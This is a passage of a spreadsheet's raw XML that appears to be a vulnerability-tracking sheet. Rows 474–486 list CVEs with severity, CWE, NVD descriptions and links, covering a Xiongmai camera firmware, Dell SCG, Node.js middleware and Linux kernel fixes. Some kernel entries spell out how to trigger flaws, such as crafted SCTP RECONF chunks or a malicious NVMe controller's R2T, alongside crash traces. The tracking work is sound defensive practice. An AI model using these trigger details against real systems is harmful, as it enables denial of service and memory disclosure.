      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr"/>
      <c r="Q474" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability in the WS-Addressing Action transformation function in the Sofia IPC daemon in Xiongmai IP Camera XM530 firmware HMT.CM2005-v220608.1837 and earlier allows remote unauthenticated attackers to cause a denial of service or potentially execute arbitrary code via a crafted SOAP request containing a wsa5:Action string exceeding 128 bytes.</t>
        </is>
      </c>
      <c r="S474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79393</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79394</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr"/>
      <c r="Q475" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>An insecure default configuration in the embedded Happytime RTSP server within the Sofia IPC daemon in Xiongmai IP Camera XM530 firmware HMT.CM2005-v220608.1837 and earlier ships with authentication disabled, allowing remote unauthenticated attackers to access live H.264 video and G.711 audio feeds in cleartext over unencrypted RTP/UDP.</t>
        </is>
      </c>
      <c r="S475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79394</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79641</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr"/>
      <c r="Q476" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="S476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79641</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80987</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr"/>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NTB: ntb_transport: Reject oversized TX buffers
ntb_process_tx() handles an oversized buffer by calling tx_handler()
with a NULL data pointer and returning success. ntb_netdev therefore
neither frees the skb in its completion callback nor takes its enqueue
error path, leaking it.
Reject oversized buffers in ntb_transport_tx_enqueue() before acquiring
a queue entry and return -EMSGSIZE. The caller retains ownership of the
buffer, and the preceding netdev patch frees the skb when enqueue
returns this permanent error.</t>
        </is>
      </c>
      <c r="S477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80987</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80997</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr"/>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ipa: fix stalled modem TX queue after runtime resume
ipa_start_xmit() unconditionally stops the TX queue before calling
pm_runtime_get(), relying on the wake scheduled by runtime resume
(ipa_modem_wake_queue_work()) to restart it once power is ACTIVE.
But that work is queued from within the runtime resume callback,
before the device's power state reaches RPM_ACTIVE, so it can run
while the device is still RPM_RESUMING.  The wake is then consumed
too early: the transmit it restarts stops the queue again,
pm_runtime_get() returns -EINPROGRESS without arranging any future
wake (deferred_resume exists only for RPM_SUSPENDING), and after the
resume completes nothing is left to wake the queue.  Transmit stalls
permanently: packets pile up in the qdisc behind the stopped queue,
the device runtime-suspends, and since the netdev registers no
ndo_tx_timeout the watchdog never fires.  Observed on SM7635
(Fairphone 6) as the cellular data path going permanently deaf
within hours, RX included, since nothing resumes the suspended
endpoints.
Close the window by making the wake work wait for the resume to
complete (pm_runtime_get_sync()) before waking the queue.  Every
queue stop is then guaranteed a later wake that happens while power
is ACTIVE; a transmit racing a new suspend/resume cycle re-schedules
the work.  If the device could not be resumed, wake the queue anyway
so pending packets are dropped by the transmit path rather than
stranded.
The STARTED power flag used to narrow this window: a wake running
before the transmit path's stop suppressed that stop, but only once,
as the flag was cleared by the first stop it absorbed.  Removing the
flag made a single transmit during an in-flight resume sufficient to
strand the queue, which is the form observed.
With an accelerated reproducer (autosuspend delay shortened to 5 ms,
~20 packets/s of TX), an unpatched kernel stalled three times in
230 s / 4380 packets; with this patch the same test ran 3601 s /
70298 packets without a stall.</t>
        </is>
      </c>
      <c r="S478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80997</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80998</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr"/>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bnxt: ring the doorbell when SW USO exits early
When a burst of packets is handed down to the driver, the driver defers
the doorbell to the end by setting txr-&gt;kick_pending = 1. The normal TX
path handles this, but the SW USO path can miss it if it returns
early.
If bnxt_sw_udp_gso_xmit runs but returns early with NETDEV_TX_BUSY and
txr-&gt;kick_pending was previously set to 1, then the TX queue can
stall because the driver wrote some BDs but never wrote the doorbell.
The device won't know to do the TX which would generate the completion
that would wake the queue back up.
Simplify bnxt_sw_udp_gso_xmit to set txr-&gt;kick_pending in its success
case and check the flag on return. The added check after
bnxt_sw_udp_gso_xmit returns ensures that any pending doorbells are
written handling both successful USO and any early returns, which
prevents the TX queue stall mentioned above.
This TX queue stall was observed on a production system with a netdev TX
watchdog informing about the queue stall.</t>
        </is>
      </c>
      <c r="S479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80998</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87776</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr"/>
      <c r="Q480" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-459</t>
        </is>
      </c>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>compression is a Node.js and Express compression middleware. In versions before 1.8.2, when a client aborts the connection while a compressed response is still being sent, the zlib stream created to compress that response is never destroyed, so each aborted compressed response leaks its native zlib memory. A remote unauthenticated attacker can repeatedly open requests and disconnect early, exhausting the available memory and crashing the server. All applications using compression are affected. The issue is fixed in compression 1.8.2, and users should upgrade to 1.8.2 or later.</t>
        </is>
      </c>
      <c r="S480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87776</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87908</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr"/>
      <c r="Q481" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>multiparty is a Node.js library for parsing multipart/form-data request bodies. In versions from 2.1.0 up to but not including 4.3.1, the parser does not bound the amount of memory used while accumulating the headers of a single multipart part. An unauthenticated attacker can send a single request whose part carries a very large volume of header bytes, forcing the parser to buffer all of them and exhausting the process memory, which crashes the server. This is a denial of service with no confidentiality or integrity impact. The issue is fixed in multiparty 4.3.1, which caps the size of the accumulated part headers. Users should upgrade to multiparty 4.3.1 or later.</t>
        </is>
      </c>
      <c r="S481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87908</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89476</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr"/>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: fix stream-&gt;outcnt underflow on duplicate RECONF responses
A cached RECONF chunk may contain more than one request parameter.  A
duplicate response can therefore find and process the same ADD_OUT request
again while another parameter is still outstanding, rolling back outcnt
twice and possibly underflowing it.
Track outstanding request types as bits and clear each bit after its first
response.  Later responses for the same request are then ignored.</t>
        </is>
      </c>
      <c r="S482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89476</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89477</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr"/>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: fix NULL deref on untransmitted RECONF completion
sctp_process_strreset_outreq(), sctp_process_strreset_addstrm_out() and
sctp_process_strreset_resp() complete a pending stream reconfiguration
request by stopping the reconf timer on the transport it was sent on:
	t = asoc-&gt;strreset_chunk-&gt;transport;
	if (timer_delete(&amp;t-&gt;reconf_timer))
		sctp_transport_put(t);
chunk-&gt;transport is assigned by __sctp_packet_append_chunk() when the
chunk is appended to an outbound packet, and sctp_outq_flush_ctrl() arms
the reconf timer at that same point. A request already published in
asoc-&gt;strreset_chunk but not yet transmitted has neither, so completing
it dereferences NULL.
Two ways to get there. sctp_send_asconf_del_ip() sets
asoc-&gt;src_out_of_asoc_ok without sending anything when the address being
removed is the association's last one, and sctp_outq_flush_ctrl() then
leaves every non-ASCONF control chunk queued; as only
sctp_process_asconf_ack() clears that flag, it persists. An unprivileged
process that removes such an address and then asks for a stream reset
panics the kernel from softirq. A peer needs neither ASCONF nor local
help: sctp_cmd_interpreter() uncorks the outqueue only once the whole
packet has been processed, so a reply built while walking a RECONF chunk
stays untransmitted for the rest of that walk, and one RECONF chunk
carrying [Incoming SSN Reset Request, Outgoing SSN Reset Request,
Response] -- or two RECONF chunks in one packet -- reaches the same
dereference.
  KASAN: null-ptr-deref in range [0x00000000000001e8-0x00000000000001ef]
  RIP: 0010:timer_delete+0x67/0x110
  Call Trace:
   &lt;IRQ&gt;
   sctp_process_strreset_addstrm_out (net/sctp/stream.c:832)
   sctp_sf_do_reconf (net/sctp/sm_statefuns.c:4212)
   sctp_do_sm (net/sctp/sm_sideeffect.c:1172)
   sctp_assoc_bh_rcv (net/sctp/associola.c:1044)
   sctp_rcv (net/sctp/input.c:243)
   ip_local_deliver (net/ipv4/ip_input.c:262)
   process_backlog (net/core/dev.c:6680)
   &lt;/IRQ&gt;
A response can only acknowledge a request that was actually sent, so do
not match asoc-&gt;strreset_chunk while chunk-&gt;transport is NULL. Guarding
the lookup covers all three completion sites.</t>
        </is>
      </c>
      <c r="S483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89477</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89480</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr"/>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-tcp: reject a read that transferred too few bytes
nvme_tcp_recv_data() completes a request once the current C2HData PDU
has been consumed. Nothing compares the total bytes received against
the length the command asked for: struct nvme_tcp_request has no
receive-side counter, queue-&gt;data_remaining is per queue, and
blk_mq_end_request() completes for blk_rq_bytes(rq) unconditionally
with no residual concept anywhere above.
A controller can therefore answer a 4096-byte read with 512 bytes and
have it reported as a complete read; user space then gets 4096 bytes of
which 3584 are whatever was already in the page. I reproduced that with
a test target.
Count the bytes received and refuse to complete a successful read whose
count does not match, at the two NVME_TCP_F_DATA_SUCCESS paths and in
nvme_tcp_process_nvme_cqe(). The success test shifts req-&gt;status right
by one, because the driver keeps the wire value there and shifts it on
completion, so the check must see what the completion path will see.
Only REQ_OP_READ is checked, because there the length comes from the
sectors the request covers; a passthrough command is built by its
submitter, which picks both command and buffer, so the kernel has
nothing to compare against.</t>
        </is>
      </c>
      <c r="S484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89480</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89481</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr"/>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-tcp: fix host memory disclosure on R2T for a read command
nvme_tcp_handle_r2t() does not check the direction of the request the
R2T refers to. A malicious controller can send an R2T for a READ and
the host will answer it: nvme_tcp_setup_h2c_data_pdu() builds the
H2CData header and nvme_tcp_try_send_data() sends the request's data
buffer. That buffer is the READ destination, so its contents go to the
controller.
The command then completes normally and nothing is logged.
Against a test controller that answers every READ with an R2T, a 4096
byte buffered read returned all 4096 bytes, split over two R2Ts. The
pages contained stale kernel data, including an array of struct page
pointers.
Reject an R2T for a request that is not a write.</t>
        </is>
      </c>
      <c r="S485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89481</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89483</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr"/>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: zero the discard fallback page
nvme_setup_discard() always maps sizeof(struct nvme_dsm_range) *
NVME_DSM_MAX_RANGES = 4096 bytes as the DSM payload however many ranges
the command declares, because some devices ignore the 'Number of Ranges'
field - the Fixes: commit records two that read past the declared ranges.
A single-range discard fills only the first 16 bytes.
Normally the buffer comes from kzalloc() and the other 4080 bytes are
zero.  When that allocation fails the code falls back to the
per-controller ctrl-&gt;discard_page, which nvme_init_ctrl() obtains with
alloc_page(GFP_KERNEL) and nothing ever zeroes, so those 4080 bytes are
whatever the page last held and are handed to the controller.  Reaching
it requires the kzalloc(GFP_ATOMIC | __GFP_NOWARN) to fail, that is
memory pressure; it is not remotely triggerable.  Failing the allocation
under KMSAN reproduces it, with the leaked tail full of vmemmap struct
page pointers.  The extent in the report is a partial transfer of the
payload, not the whole 4096 bytes; the 16-byte boundary in it is the one
declared range:
[   11.991601] BUG: KMSAN: uninit-value in dma_map_phys+0x14c8/0x1900
[   11.991969]  dma_map_phys+0x14c8/0x1900
[   11.992220]  dma_map_page_attrs+0xcf/0x130
[   11.992485]  e1000_xmit_frame+0x4099/0x6d10
[   11.992768]  dev_hard_start_xmit+0x22f/0xa80
[   11.993068]  sch_direct_xmit+0x35c/0xcb0
[   11.993315]  __dev_queue_xmit+0x1ee5/0x5eb0
[   11.993608]  ip_finish_output2+0x1903/0x1c30
[   11.993881]  ip_finish_output+0x288/0x870
[   11.994125]  ip_output+0x15e/0x400
[   11.994365]  __ip_queue_xmit+0x1e85/0x1fb0
[   11.994639]  ip_queue_xmit+0x60/0x80
[   11.994899]  __tcp_transmit_skb+0x4e71/0x5fa0
[   11.995210]  tcp_write_xmit+0x3a36/0x9160
[   11.995533]  __tcp_push_pending_frames+0xc5/0x3c0
[   11.995854]  tcp_push+0x7dc/0x840
[   11.996076]  tcp_sendmsg_locked+0x766c/0x8400
[   11.996371]  tcp_sendmsg+0x4b/0x90
[   11.996572]  inet_sendmsg+0x134/0x2a0
[   11.996823]  __sock_sendmsg+0x265/0x360
[   11.997076]  sock_sendmsg+0x100/0x1e0
[   11.997293]  nvme_tcp_try_send+0x196f/0x6370
[   11.997605]  nvme_tcp_queue_rq+0x1d54/0x20b0
[   11.997882]  blk_mq_dispatch_rq_list+0x5ee/0x2e50
[   11.998175]  __blk_mq_sched_dispatch_requests+0x16dc/0x24a0
[   11.998539]  blk_mq_sched_dispatch_requests+0x11b/0x2c0
[   11.998865]  blk_mq_run_work_fn+0x13b/0x280
[   11.999146]  process_scheduled_works+0x966/0x1ad0
[   11.999465]  worker_thread+0xe44/0x1480
[   11.999709]  kthread+0x53b/0x600
[   11.999927]  ret_from_fork+0x29f/0x7c0
[   12.000191]  ret_from_fork_asm+0x1a/0x30
[   12.000460]
[   12.000558] Uninit was created at:
[   12.000788]  __alloc_frozen_pages_noprof+0x8bf/0xd30
[   12.001096]  alloc_pages_mpol+0x1d0/0x5f0
[   12.001326]  alloc_pages_noprof+0x102/0x290
